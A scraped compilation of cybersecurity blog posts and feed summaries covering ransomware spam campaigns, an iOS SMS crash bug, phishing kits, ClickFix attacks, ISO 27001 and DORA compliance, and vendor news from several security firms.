The text associated with the BIS proposal says the scope includes penetration testing products that use intrusion software in what looks like an attempt to limit "hacking" tools, but there is nothing about what is excluded from the scope. So the BIS might not intend to limit customers from uploading malware samples to their AV vendor, but that could be the effect if this new rule is adopted and arbitrarily enforced. Or else it could just force people to operate in a legal limbo. Is that what we want?

The BIS is taking comments until July 20th.

On 09/06/15 At 01:25 PM

Found Item: UK Wi-Fi Law?

Posted by Sean @ 13:27 GMT

I visited the UK last Thursday, found a coffee shop offering "free" Wi-Fi, and read this…

"UK Law states that we must know who is using our Wi-Fi at all times."

Now I'm not a lawyer — but that seems like quite the disingenuous claim.



Mobile number, post code, and date of birth??

I wonder how many people fall for this type of malarkey.

Post by — @Sean

On 08/06/15 At 01:27 PM

SMS Exploit Messages

Posted by Sean @ 13:56 GMT

There's an iOS vulnerability affecting iPhone, iPad, and even Apple Watch that allows for a denial of service.

Crashing a phone with an SMS? That's so 2008.


S60 SMS Exploit Messages

Unlike 2008, this time kids are reportedly using the vulnerability to harass others.

Apple is working on a security update. But unfortunately… that update very likely won't be available for older iPhones.

Updated to add:

Here's the "Effective Power" exploit crashing an iPhone 6:


Effective Power Unicode iOS hack on iPhone 6

And this… is Effective Power crashing the iOS Twitter app:


Effective Power Unicode iOS hack vs Twitter

On 28/05/15 At 01:56 PM

Ransomware Spam E-Mails Targeting Users in Italy and Spain

Posted by FSLabs @ 03:17 GMT

In the past few days, we received some cases from our customers in Italy and Spain, regarding malicious spam e-mails that pointed to Cryptowall or Cryptolocker ransomware.

The spam e-mails pretended to come from a courier/postal service, regarding a parcel that was waiting to be collected. The e-mails offer a link to track that parcel online:



When we did the initial investigation of the e-mails from our standard test system, the link redirected to Google:



So, no malicious behavior? Well, we noted that the first two URLs were PHP. Since PHP code is executed on the server side, not locally on the client, it is possible that the servers were 'deciding' whether to redirect the user to Google or to serve malicious content, based on some preset conditions.

Since this particular spam e-mail is written in Italian - perhaps only a customer based in Italy would be able to see the malicious payload? Fortunately, we have Freedome, so we can travel to Italy for a little while to experiment.

So we turned on Freedome, set the location to Milan and clicked the link in the e-mail again:



Now we see the bad stuff. If the user is (or appears to be) located in Italy, the server will redirect them to a malicious file hosted on a cloud storage server.

The e-mail spam sent to Spanish users is similar, though in those cases, a CAPTCHA challenge is included to make the site seem more authentic. If the link in the e-mail is clicked by a user located outside Spain, again we end up in Google:



If the site is visited instead from an Spanish IP, we get to the CAPTCHA screen:



And then to the malware itself:



This spam campaign doesn't use any exploits (so far), just old-fashioned social engineering; infection only occurs if the user manually downloads and executes the files offered on the malicious URLs. For our customers, the URLs are blocked and the files are detected.

(malware SHA1s: 483be8273333c83d904bfa30165ef396fde99bf2, 295042c167b278733b10b8f7ba1cb939bff3cb38)

Post by — Victor

On 19/05/15 At 03:17 AM

Mac Hack Demonstration

Posted by Sean @ 12:46 GMT

Securing your SSH password is very important. Otherwise, you might be pwned by a little girl with her Raspberry Pi.



Don't worry, it's an authorized hack, she asked her mom for permission.

On 15/05/15 At 12:46 PM

Email Security Considerations for Microsoft 365 Users

The post Email Security Considerations for Microsoft 365 Users appeared first on GreatHorn.

Email Security Considerations for Google Workspace Users

The post Email Security Considerations for Google Workspace Users appeared first on GreatHorn.

Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates

The post Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates appeared first on GreatHorn.

Universities and Colleges Face Multi-faceted Email Security Challenges

The post Universities and Colleges Face Multi-faceted Email Security Challenges appeared first on GreatHorn.

Spam vs Phish: The Problem with User-Reported Phish Buttons

The post Spam vs Phish: The Problem with User-Reported Phish Buttons appeared first on GreatHorn.

Phishing for Google Impersonation Attacks

Bad actors around the globe go phishing in emails twenty-four hours a day, seven days a week. Whether they are “guppies” like your local bakery down the street or big “fish” like Google, no one is immune to their attacks. Google, one of the largest, most well-known – and used – applications, will always be […]

The post Phishing for Google Impersonation Attacks appeared first on GreatHorn.

GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes

The post GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes appeared first on GreatHorn.

Native vs SEG vs ICES: What You Need to Know About Email Security

The shift from on-premise email platforms to cloud email platforms has taken shape, with the majority (70%) of organizations. Microsoft 365 and Google Workspace remain the predominant email platforms for organizations. However, a significant change has occurred in the past year. With an estimated 40% of ransomware attacks that start through email, and BEC and […]

The post Native vs SEG vs ICES: What You Need to Know About Email Security appeared first on GreatHorn.

Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security

In cybersecurity, buzzwords come and go, often being replaced with new buzzwords while the market is still attempting to realize the benefits of the former. Today, every technology vendor is talking about Artificial Intelligence (AI). In reality, Machine Learning (the method to one day achieve AI) is still the predominant technical solution deployed within vendor […]

The post Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security appeared first on GreatHorn.

Global Supply Chain: Attackers Targeting Business Deliveries

Our global supply chain includes all the people, companies and countries that need to work cohesively to manufacture, process and ship goods. Disruptions in the global supply chain are increasingly impacting organizations, with logistical problems crossing most industries.  As a result, the continued strain on the supply chain puts added pressure on businesses as they […]

The post Global Supply Chain: Attackers Targeting Business Deliveries appeared first on GreatHorn.

Digital Warfare and the New Geopolitical Frontline

This article follows our recent article on the source of cybercrime attacks – read it here – we’re now exploring the global, commercial, and political dimensions of digital warfare. Key takeaways $100 billion in global cyber damages annually – equivalent to the GDP of a mid-sized nation. $400 million in business impact from a single […]

The post Digital Warfare and the New Geopolitical Frontline appeared first on Heimdal Security Blog.

Nearly 40% of 2024 Ransomware Payouts May Have Gone to Russia, China & North Korea

Ransomware victims paid an estimated $813 million in 2024. Nearly 40 percent of that may have gone to actors in Russia, China and North Korea, according to new analysis from cybersecurity firm Heimdal. Heimdal used recent telemetry, infrastructure tracing and ownership mapping to assess how ransomware revenue is likely distributed. The $813 million figure comes […]

The post Nearly 40% of 2024 Ransomware Payouts May Have Gone to Russia, China & North Korea appeared first on Heimdal Security Blog.

What is Managed ITDR? Key Definitions, Features, and Benefits

Key takeaways: MITDR explained: Managed ITDR combines identity threat detection with expert-led response. Why it matters: Get better protection and lower costs without building a full in-house team. What to look for: Prioritize behavioral monitoring, real-time response, and expert oversight You’ve got the ITDR solution. That’s a good step towards effective account and identity-based threat […]

The post What is Managed ITDR? Key Definitions, Features, and Benefits appeared first on Heimdal Security Blog.

Retail cybersecurity statistics for 2025

Cyber attacks against retail businesses have made headlines in 2025. Read this retail cybersecurity statistics rundown to understand more.  For cyber criminals, the retail sector makes for a very attractive target. Retail businesses hold vast troves of valuable customer details, payment information and inventory data. What is more, any disruption caused by cyber crime is […]

The post Retail cybersecurity statistics for 2025 appeared first on Heimdal Security Blog.

Cyber Insurance Statistics for 2025

More and more businesses are taking out cyber insurance in 2025. Read our statistics rundown to understand why.  Investing in cyber insurance is a smart move. In case of a cyber attack, it can reduce the financial burden of a breach and give businesses (and individuals) peace of mind.  Advanced cybersecurity software should always be […]

The post Cyber Insurance Statistics for 2025 appeared first on Heimdal Security Blog.

Is Your Tech Stack Killing Profitability? The Silent Bug Crippling MSP Growth

Many MSPs want to grow, but internal complexity often holds them back. In this guest article, Portland, a Heimdal partner, breaks down how fragmented systems and unclear value messaging can quietly erode profits, compliance, and trust – and how to fix it.  The “system bug” holding MSPs back “Stop talking about technology. Start talking about […]

The post Is Your Tech Stack Killing Profitability? The Silent Bug Crippling MSP Growth appeared first on Heimdal Security Blog.

Cybersecurity Has a Motivation Problem

I’ve worked in cybersecurity long enough to see that our biggest challenge isn’t a technical one, it’s motivational. We can build the strongest firewalls, design the smartest detection systems, and run endless awareness campaigns, but none of it matters if people don’t want to care. That’s the uncomfortable truth; cyber security has a motivation problem. […]

The post Cybersecurity Has a Motivation Problem appeared first on Heimdal Security Blog.

Agent Fatigue Is Real and Your Security Stack Is to Blame

Your senior analyst stares at alert number 47. It’s not even lunch. Another “suspicious login detected.” They switch to the third dashboard of the morning, cross-reference the user activity, and confirm what they already knew. Bob from accounting is working late again. Meanwhile, three dashboards over, actual lateral movement is happening on a client’s network. […]

The post Agent Fatigue Is Real and Your Security Stack Is to Blame appeared first on Heimdal Security Blog.

Heimdal 5.0.0 RC: RDP Protection, Ransomware Detection, and OS Deployment

Version 5.0.0 adds three major features for MSPs. a module that controls RDP access an improved ransomware detection engine a simpler way to deploy Windows over the network. Remote Access Protection (RAP): Block Unauthorized RDP Attempts RDP brute-force attacks remain a top breach vector, so we built a new module that monitors and filters Remote […]

The post Heimdal 5.0.0 RC: RDP Protection, Ransomware Detection, and OS Deployment appeared first on Heimdal Security Blog.

Where Ransomware Profits Go and How to Cut Them Off

Researched and written by Heimdal founder Morten Kjaersgaard, this article exposes how even limited cooperation between registry bodies and law enforcement could cripple ransomware networks and raise the cost for cybercriminals. This article serves as a wake-up call. Even limited cooperation between registry bodies and law enforcement could cripple ransomware networks and raise the cost […]

The post Where Ransomware Profits Go and How to Cut Them Off appeared first on Heimdal Security Blog.

ITDR vs EDR: What are the Key Differences?

Key takeaways: What are the main differences between ITDR, EDR, and other security solutions? How does ITDR provide effective protection against identity-based threats? How to effectively detect and respond to attacks. If there’s one thing the cybersecurity community loves, it’s an acronym. To some extent, this has been the case since the earliest days of cybersecurity. […]

The post ITDR vs EDR: What are the Key Differences? appeared first on Heimdal Security Blog.

What Is Identity Threat Detection and Response?

Key insights: What is identity threat detection and response (ITDR)? What are the differences and similarities between ITDR and EDR? What are the alternatives to ITDR? Identity Threat Detection and Response (ITDR) is a comparatively new term in the cybersecurity scene. It was first coined by Gartner in 2022 and has since become a cornerstone […]

The post What Is Identity Threat Detection and Response? appeared first on Heimdal Security Blog.

Small Business Cybersecurity Statistics in 2025

Small businesses are a big target for cyber criminals. Read our small business statistics rundown to get a true picture of how the sector is being affected in 2025. Until relatively recently, cybercrime wasn’t perceived as a major risk for small businesses. Hackers traditionally focused on larger companies or government bodies with more money and […]

The post Small Business Cybersecurity Statistics in 2025 appeared first on Heimdal Security Blog.

Follow the Money Blueprint For MSP Success (With Dave Sobel)

“If I was starting an MSP today, I am not sure I would start an MSP.” Now that’s a way to grab your attention when opening a podcast. Coming from Dave Sobel, someone who’s been an MSP owner, vendor executive, and now runs The Business of Tech podcast – that’s not a throwaway comment. Dave […]

The post Follow the Money Blueprint For MSP Success (With Dave Sobel) appeared first on Heimdal Security Blog.

Digital doppelgängers: How sophisticated impersonation scams target content creators and audiences

Content creation is no longer niche. Over 50 million Americans earn income by making videos, livestreams, podcasts, or other digital media. Many are full-time creators, while others pursue it as a side hustle. Either way, having an online presence is becoming increasingly risky.  Scammers are catching on. In 2024 alone, the Federal Trade Commission’s logged […]

The post Digital doppelgängers: How sophisticated impersonation scams target content creators and audiences appeared first on Heimdal Security Blog.

Finger.exe & ClickFix, (Sun, Nov 16th)

The finger.exe command is used in ClickFix attacks.

SANS Holiday Hack Challenge 2025, (Sun, Nov 16th)

The SANS Holiday Hack Challengeâ„¢ 2025 is available.

Honeypot: FortiWeb CVE-2025-64446 Exploits, (Sat, Nov 15th)

Like many have reported, we too noticed exploit attempts for CVE-2025-64446 in our honeypots.

Microsoft Office Russian Dolls, (Fri, Nov 14th)

ISC Stormcast For Friday, November 14th, 2025 https://isc.sans.edu/podcastdetail/9700, (Fri, Nov 14th)

No summary available.

Formbook Delivered Through Multiple Scripts, (Thu, Nov 13th)

When I'm teachning FOR610[1], I always say to my students that reverse engineering does not only apply to “executable files” (read: PE or ELF files). Most of the time, the infection path involves many stages to defeat the Security Analyst or security controls. Here is an example that I found yesterday. An email was received via an attached ZIP archive. It contained a simple file: “Payment_confirmation_copy_30K__202512110937495663904650431.vbs” (SHA256:d9bd350b04cd2540bbcbf9da1f3321f8c6bba1d8fe31de63d5afaf18a735744f) identified by 17/65 antiviruses on VT[2]. Let's have a look at the infection path.

ISC Stormcast For Thursday, November 13th, 2025 https://isc.sans.edu/podcastdetail/9698, (Thu, Nov 13th)

No summary available.

SmartApeSG campaign uses ClickFix page to push NetSupport RAT, (Wed, Nov 12th)

Introduction

ISC Stormcast For Wednesday, November 12th, 2025 https://isc.sans.edu/podcastdetail/9696, (Wed, Nov 12th)

No summary available.

Microsoft Patch Tuesday for November 2025, (Tue, Nov 11th)

Today&#;x26;#;39;s Microsoft Patch Tuesday offers fixes for 80 different vulnerabilities. One of the vulnerabilities is already being exploited, and five are rated as critical.

New Android Malware Platform Targets Bank Accounts

Researchers at Zimperium are tracking a new malware-as-a-service platform designed to target Android phones with banking Trojans. The platform, dubbed “Fantasy Hub,” allows unskilled threat actors to launch sophisticated malware campaigns that trick victims into granting access to their bank accounts.

2025 Cybersecurity Awareness Month by the Numbers

Organizations rely on KnowBe4 to educate millions of people each month on security awareness and compliance topics, and every October, during Cybersecurity Awareness Month, engagement with our training content sets new records. 2025 was no exception.

Your KnowBe4 Compliance Plus Fresh Content Updates from October 2025

We’re thrilled to announce KnowBe4 Studios, uniting our world-class creative teams under one powerful brand for our Compliance Plus library. Leveraging the latest AI technologies and the expertise of our global content creators, we’re set to produce more engaging compliance training than ever before—including fresh microcontent, interactive games and expanded storytelling experiences. This evolution marks the next phase in our quest to disrupt compliance training, which in combination with our security awareness training, helps your organization rise above risk. 

Tycoon 2FA Phishing Kit Grows More Sophisticated

Cybereason warns that the Tycoon 2FA phishing kit continues to receive upgrades, allowing unskilled cybercriminals to launch sophisticated social engineering attacks. The platform is known for its ability to bypass multi-factor authentication measures.

Introducing KnowBe4 Studios | Fresh Content Updates from October 2025

We’re thrilled to announce KnowBe4 Studios, uniting our world-class creative teams under one powerful brand. Leveraging the latest AI technologies and the expertise of our global content creators, we’re set to produce more engaging cybersecurity training than ever before—including fresh microcontent, interactive games, and expanded storytelling experiences. This evolution marks the next chapter in delivering the most popular cybersecurity and highest-rated content on the planet, with even greater innovation, creativity, and impact ahead.

Warning: ClickFix Attacks are Growing More Sophisticated

Researchers at Push Security warn of an extremely convincing ClickFix attack posing as a Cloudflare verification check. ClickFix is a social engineering technique that tricks the victim into copying and pasting a malicious command, then running it on their computer. 

CyberheistNews Vol 15 #45 [Under the Radar] Scammers Use Real Bodies, Fake Faces in Extortion Scams

Quantum Route Redirect: Anonymous Tool Streamlining Global Phishing Attack

Lead Analysts: Jeewan Singh Jalal, Prabhakaran Ravichandhiran and Anand Bodke

KnowBe4 Threat Labs has uncovered an emerging advanced phishing campaign targeting Microsoft 365 users globally to steal their credentials. The attackers are wielding a powerful new tool that’s completely changing the game for cybercriminals—turning what used to be complex, technical phishing setups into simple one-click launches that can bypass certain technical controls.

Africa is Being Targeted by a Surge in AI-Fueled Phishing Attacks

AI-fueled cyberattacks are increasingly targeting entities across Africa, according to Robert Lemos at Dark Reading.

Lemos cites two recent reports from Microsoft and Group-IB that warned of a rise in attacks targeting African organizations, with threat actors using AI to assist in various steps of the attack chain.

Warning: Malicious Apps Are Impersonating AI Tools

Researchers at Appknox warn that malicious apps are impersonating popular AI tools like ChatGPT and DALL-E to trick users into installing malware on their mobile devices. Some of these apps simply collect user data to be sold to advertising services, while others act as full-fledged malware.

MY TAKE: AI’s fortune-teller effect — why it’s all too easy to mistake pattern mastery for wisdom

I hadn’t expected the machine’s answer to be that good.

Related: The AI bubble is inflating

It was a simple prompt — I needed help crafting a reply to a client. One of those mid-project check-ins where timing gets murky … (more…)

The post MY TAKE: AI’s fortune-teller effect — why it’s all too easy to mistake pattern mastery for wisdom first appeared on The Last Watchdog.

GUEST ESSAY: How to defend against decision mimicry — a practical AI-era checklist for leaders

AI is getting better at mimicking how leaders think — not just how they sound.

Related: Can AI mimic my personality?

The latest wave of deepfake attacks isn’t about dramatic voice-cloning or bold social engineering. Instead, the bigger risk may … (more…)

The post GUEST ESSAY: How to defend against decision mimicry — a practical AI-era checklist for leaders first appeared on The Last Watchdog.

News Alert: Gartner ranks ThreatBook a ‘strong performer’ in NDR for the third consecutive year

SINGAPORE, Nov. 13, 2025, CyberNewswire – ThreatBook, a global leader in threat intelligence-based cybersecurity solutions, today announced that for its Threat Detection Platform (TDP), it has been recognized as a Strong Performer in the 2025 Gartner Peer Insights Voice of … (more…)

The post News Alert: Gartner ranks ThreatBook a ‘strong performer’ in NDR for the third consecutive year first appeared on The Last Watchdog.

News alert: Insider risk report finds behavioral blind spots leave most orgs exposed, confidence low

BALTIMORE, Nov. 4, 2025, CyberNewswire — he new 2025 Insider Risk Report, produced by Cybersecurity Insiders in collaboration with Cogility, highlights that nearly all security leaders (93%) say insider threats are as difficult or harder to detect than … (more…)

The post News alert: Insider risk report finds behavioral blind spots leave most orgs exposed, confidence low first appeared on The Last Watchdog.

MY TAKE: From AOL-Time Warner to OpenAI-Amazon — is the next tech bubble already inflating?

Anyone remember the dot-com bubble burst? The early warning came in January 2000, when AOL and Time Warner joined forces in a $164 billion deal — the largest merger in U.S. history at the time.

Related: Reuters’ backstory on Amazon … (more…)

The post MY TAKE: From AOL-Time Warner to OpenAI-Amazon — is the next tech bubble already inflating? first appeared on The Last Watchdog.

MY TAKE: Microsoft pitches an AI ‘protopian’ future — while civic groups pedal to stay upright

SEATTLE — At a well-meaning civic forum hosted inside a south Seattle community space yesterday (Oct. 30,) Microsoft’s Lorraine Bardeen coined a new term: protopian.

Related: The workflow cadences of GenAI

She said it three times, as if underlining … (more…)

The post MY TAKE: Microsoft pitches an AI ‘protopian’ future — while civic groups pedal to stay upright first appeared on The Last Watchdog.

News alert: Aembit extends Workload IAM to close the access-control gap in enterprise AI deployments

SILVER SPRING, Md., Oct. 30, 2025, CyberNewswire — Aembit today announced the launch of Aembit Identity and Access Management (IAM) for Agentic AI, a set of capabilities that help organizations safely provide and enforce access policies for AI agents as … (more…)

The post News alert: Aembit extends Workload IAM to close the access-control gap in enterprise AI deployments first appeared on The Last Watchdog.

MY TAKE: What a cystoscopy taught me about the changing face of patient care — and trusting AI

The other day, I found myself flat on my back in a urologist’s exam room, eyes fixed on the ceiling tiles as a cystoscope made its slow, deliberate circuit.

Related: Click-baiters are having an AI  field day

Dr. Mitchell narrated … (more…)

The post MY TAKE: What a cystoscopy taught me about the changing face of patient care — and trusting AI first appeared on The Last Watchdog.

MY TAKE: Have you noticed how your phone’s AI assistant is starting to remap what you trust?

This morning, I tried to power down my Samsung S23 smartphone.

Related: Sam Altman seeks to replace the browser

I long-pressed the side key expecting the usual “Power off / Restart” menu. Instead, a small Gemini prompt window appeared towards … (more…)

The post MY TAKE: Have you noticed how your phone’s AI assistant is starting to remap what you trust? first appeared on The Last Watchdog.

News alert: Arsen rolls out ‘Smishing Simulation’ to strengthen defenses against mobile phishing threats

PARIS, Oct. 24, 2025, CyberNewswire — Arsen, the cybersecurity company dedicated to helping organizations defend against social engineering, today introduced its new Smishing Simulation module: a feature designed to let companies run realistic, large-scale SMS phishing simulations across their … (more…)

The post News alert: Arsen rolls out ‘Smishing Simulation’ to strengthen defenses against mobile phishing threats first appeared on The Last Watchdog.

Be careful responding to unexpected job interviews

Contacted out of the blue for a virtual interview? Be cautious. Attackers are using fake interviews to slip malware onto your device.

Your passport, now on your iPhone. Helpful or risky?

Apple's Digital ID makes travel smoother and saves you from digging for documents, but it comes with privacy and security trade-offs. We break down the pros and cons.

1 million victims, 17,500 fake sites: Google takes on toll-fee scammers

Google’s suing Lighthouse, a Chinese Phishing-as-a-Service platform that uses Google’s branding on scam sites to trick victims.

Are you paying more than other people? NY cracks down on surveillance pricing

New York is calling out data-driven pricing, where algorithms use your clicks, location and search history to tweak what you pay.

We opened a fake invoice and fell down a retro XWorm-shaped wormhole

In 2025, receiving a .vbs “invoice” is like finding a floppy disk in your mailbox. It's retro, suspicious, and definitely not something you should run.

Phishing emails disguised as spam filter alerts are stealing logins

Think twice before clicking that "Secure Message" alert from your organization's spam filters. It might be a phish built to steal your credentials.

Update now: November Patch Tuesday fixes Windows zero-day exploited in the wild

This month’s Windows update closes several major security holes, including one that’s already being used by attackers. Make sure your PC is up to date.

How Malwarebytes stops the ransomware attack that most security software can’t see

Discover how Malwarebytes detects and blocks network-based ransomware attacks that bypass traditional ransomware protection.

Samsung zero-day lets attackers take over your phone

A critical vulnerability that affects Samsung mobile devices was exploited in the wild to distribute LANDFALL spyware.

How credentials get stolen in seconds, even with a script-kiddie-level phish

Even a sloppy, low-skill phish can wreck your day. We go under the hood of this basic credential-harvesting campaign.

Stolen iPhones are locked tight, until scammers phish your Apple ID credentials

Stolen iPhones are hard to hack, so thieves are phishing the owners instead. How fake ‘Find My’ messages trick victims into sharing their Apple ID login.

Fantasy Hub is spyware for rent—complete with fake app kits and support

Fantasy Hub RAT-for-rent hides in fake Android apps, stealing logins, PINs, and messages—all with a single SMS permission.

Watch out for Walmart gift card scams

The only thing you’re winning here is a spot on marketing lists you never asked to join.

A week in security (November 3 – November 9)

A list of topics we covered in the week of November 3 to November 9 of 2025

Malwarebytes scores 100% in AV-Comparatives Stalkerware Test 2025

AV-Comparatives put 13 top Android security apps to the test against stalkerware. Malwarebytes caught them all.

Fake CAPTCHA sites now have tutorial videos to help victims install malware

ClickFix campaign pages now have embedded videos to helpfully walk users through the process of infecting their own systems.

Hackers commit highway robbery, stealing cargo and goods

There’s a modern-day train heist happening across America, and some of the bandana-masked robbers are sitting behind screens.

Android malware steals your card details and PIN to make instant ATM withdrawals

Forget card skimmers—this Android malware uses your phone’s NFC to help criminals pull cash straight from ATMs.

Take control of your privacy with updates on Malwarebytes for Windows

Malwarebytes for Windows introduces powerful privacy controls, so you get to decide how Microsoft uses your data—all from one simple screen.

Cyberattacks on UK water systems reveal rising risks to critical infrastructure

New data shows hackers targeted UK water systems five times since 2024, raising concerns about critical infrastructure defenses worldwide.

Global Data Breaches and Cyber Attacks in October 2025 – At Least 21.2 Million Breached Records

Summary Welcome to another monthly round-up of monthly cyber attack and data breach news. October 2025 saw 20 publicly reported cyber attacks and data breaches around the globe. In total, at least 21.2 million records were confirmed to have breached As ever, these are the incidents that made the news this month – the list is, by necessity, far from exhaustive. The month’s five largest incidents Prosper Marketplace Dukaan Allianz Life Insurance Company of North America WestJet Motility Software Solutions Trends in October 2025 Key vulnerabilities exploited List of data breaches and cyber attacks disclosed in October 2025 Disclosure date Organisation

The post Global Data Breaches and Cyber Attacks in October 2025 – At Least 21.2 Million Breached Records appeared first on IT Governance Blog.

GRC Solutions Named Among the UK’s Top 20 Cyber Security Innovators

We’re delighted to announce that GRC Solutions – the new name for IT Governance – has been recognised as one of the UK’s leading cyber security companies, ranking 19th in TechRound’s Cybersecurity40 2025 list. The annual campaign celebrates the most innovative and forward-thinking cyber security organisations across the UK and Europe, highlighting those helping businesses and public bodies stay secure in an increasingly complex threat landscape. TechRound – the UK’s independent voice for startups and the wider technology sector – evaluates entrants based on innovation, impact and contribution to the cyber security industry. The 2025 list showcases a diverse range

The post GRC Solutions Named Among the UK’s Top 20 Cyber Security Innovators appeared first on IT Governance Blog.

Data Leakage Prevention and Data Deletion – ISO 27001 Controls 8.12 and 8.12 Explained

ISO 27001:2022 introduced several new controls designed to reflect modern security practices and the ways organisations use and manage data. Two of the most practical additions sit in the operational controls: 8.12 (data leakage prevention) and 8.10 (data deletion). Both address longstanding weaknesses in many ISMSs (information security management systems). They focus on the lifecycle of data, the risks created by its movement and the need to prevent unnecessary retention. They also bring ISO 27001 closer to regulatory expectations, particularly around access control, monitoring and data minimisation. This blog post explains what the two controls require, why they were introduced

The post Data Leakage Prevention and Data Deletion – ISO 27001 Controls 8.12 and 8.12 Explained appeared first on IT Governance Blog.

Threat Intelligence – ISO 27001:2022 Control 5.7 Explained

Cyber attacks evolve faster than traditional security review cycles. So, to stay secure, organisations need a clearer understanding of the threats that are most relevant to their systems, data and business operations. Threat intelligence is the process of collecting and analysing information about these threats so that security decisions are informed by real-world attack patterns rather than theoretical risk models. Done well, it enables organisations to both pre-empt attacks and respond more effectively when incidents happen. This is the purpose of ISO 27001:2022 control 5.7. As one of 11 new controls introduced by the 2022 iteration of the Standard, it

The post Threat Intelligence – ISO 27001:2022 Control 5.7 Explained appeared first on IT Governance Blog.

How DORA fits with ISO 27001, NIS2 and the GDPR

Although DORA (the EU Digital Operational Resilience Act) has been in effect since January 2025, organisations that supply the EU’s financial services sector are under growing pressure to demonstrate compliance with its requirements. For most, this isn’t about starting from scratch but about mapping what’s already in place, identifying where DORA goes further and then expanding on current practices. After all, DORA builds on – not replaces – established frameworks, standards and other compliance regimes such as ISO 27001, NIS2 (the Network and Information Security Directive 2) and the GDPR (General Data Protection Regulation). It formalises ICT risk governance for

The post How DORA fits with ISO 27001, NIS2 and the GDPR appeared first on IT Governance Blog.

CISM Exam Tips from a Consultant: Five Insider Insights to Help You Pass

The CISM® (Certified Information Security Manager) exam is one of the toughest in the field – according to most providers, pass rates are around 60–65% (ISACA doesn’t publish official figures). Even experienced professionals find it demanding, something our consultants know first-hand. Soji Ogunjobi is a cyber security specialist and instructor, with nearly two decades of experience as a cyber security professional and IT auditor. He also has an MSc in Information Technology, Computer and Information Systems, as well as CISM, CISSP, CISA, CCSP and various other cyber security qualifications. Below are five practical CISM exam tips drawn directly from his

The post CISM Exam Tips from a Consultant: Five Insider Insights to Help You Pass appeared first on IT Governance Blog.

How To Comply with ISO 27001’s New Cloud Services Control

The 2022 update to ISO 27001 introduced a new control for the use of Cloud services. It outlines the policies and procedures that are required when acquiring, using, managing or exiting Cloud services. Adding this control was an obvious and necessary step given just how many organisations use Cloud services as part of their core business activities. An estimated 96% of all organisations use at least one Internet-based IT resource, such as Amazon Web Services or Microsoft Azure. Whenever an organisation implements a new resource on which sensitive data is stored or upon which key business activities rely, it must

The post How To Comply with ISO 27001’s New Cloud Services Control appeared first on IT Governance Blog.

What DORA Means for ICT Suppliers: MSPs, SaaS and Cloud in Scope

If you provide ICT (information and communication technology) services to financial institutions in the EU – whether managed services, SaaS (software as a service), Cloud facilities, payment infrastructure, or other tools and platforms – then DORA (the EU Digital Operational Resilience Act) affects you. What does DORA do? DORA creates a single, EU-wide framework for ICT risk management, incident reporting, resilience testing, third-party risk and information sharing for financial services companies. It also establishes a supervisory regime for their third-party ICT providers. For suppliers, two points are therefore important: What it means in practice You will likely see DORA in RFPs

The post What DORA Means for ICT Suppliers: MSPs, SaaS and Cloud in Scope appeared first on IT Governance Blog.

Cyber Security Must Be a Board Priority – And It Starts With Cyber Essentials

Senior ministers and national security officials have called on boards to take urgent action to strengthen their organisations’ cyber resilience. The Chancellor of the Exchequer, the Secretaries of State for Science, Innovation and Technology and for Business and Trade, the Minister for Security, the Chief Executive of the NCSC (National Cyber Security Centre) and the Director General of the NCA (National Crime Agency) have co-signed an open letter to FTSE 350 companies and other large UK organisations, warning that hostile cyber activity in the UK is “growing more intense, frequent and sophisticated”, posing “a direct and active threat to our

The post Cyber Security Must Be a Board Priority – And It Starts With Cyber Essentials appeared first on IT Governance Blog.

Top 5 Skills Every ISO 27001 Internal Auditor Needs

Internal audits are essential to ISO 27001 compliance, as mandated by Clause 9.2 – but what does it actually take to be an effective internal auditor? Many professionals know the Standard from a theoretical point of view but are less confident about audit practicalities such as interviewing staff, sampling evidence, writing findings and presenting results without friction. This blog post breaks down five practical skills every internal auditor needs and how training helps build them, turning theory into repeatable practice. Skill 1 – Evidence gathering The auditor’s role is to test whether the ISMS operates as described and achieves its

The post Top 5 Skills Every ISO 27001 Internal Auditor Needs appeared first on IT Governance Blog.

Crypto wasted: BlueNoroff’s ghost mirage of funding and jobs

Kaspersky GReAT experts dive deep into the BlueNoroff APT's GhostCall and GhostHire campaigns. Extensive research detailing multiple malware chains targeting macOS, including a stealer suite, fake Zoom and Microsoft Teams clients and ChatGPT-enhanced images.

Mem3nt0 mori – The Hacking Team is back!

Kaspersky researchers discovered previously unidentified commercial Dante spyware developed by Memento Labs (formerly Hacking Team) and linked it to the ForumTroll APT attacks.

Deep analysis of the flaw in BetterBank reward logic

Kaspersky experts break down the recent BetterBank incident involving ESTEEM token bonus minting due to the lack of liquidity pool validation.

The evolving landscape of email phishing attacks: how threat actors are reusing and refining established techniques

Common email phishing tactics in 2025 include PDF attachments with QR codes, password-protected PDF documents, calendar phishing, and advanced websites that validate email addresses.

PassiveNeuron: a sophisticated campaign targeting servers of high-profile organizations

Kaspersky GReAT experts break down a recent PassiveNeuron campaign that targets servers worldwide with custom Neursite and NeuralExecutor APT implants and Cobalt Strike.

Post-exploitation framework now also delivered via npm

The npm registry contains a malicious package that downloads the AdaptixC2 agent onto victims' devices, Kaspersky experts have found. The threat targets Windows, Linux, and macOS.

SEO spam and hidden links: how to protect your website and your reputation

Are you seeing your website traffic drop, and security systems blocking it for pornographic content that is not there? Hidden links, a type of SEO spam, could be the cause.

Maverick: a new banking Trojan abusing WhatsApp in a mass-scale distribution

A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It delivered a new Maverick banker, which features code overlaps with Coyote malware.

Mysterious Elephant: a growing threat

Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity. The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.

Signal in the noise: what hashtags reveal about hacktivism in 2025

Kaspersky researchers identified over 2000 unique hashtags across 11,000 hacktivist posts on the surface web and the dark web to find out how hacktivist campaigns function and whom they target.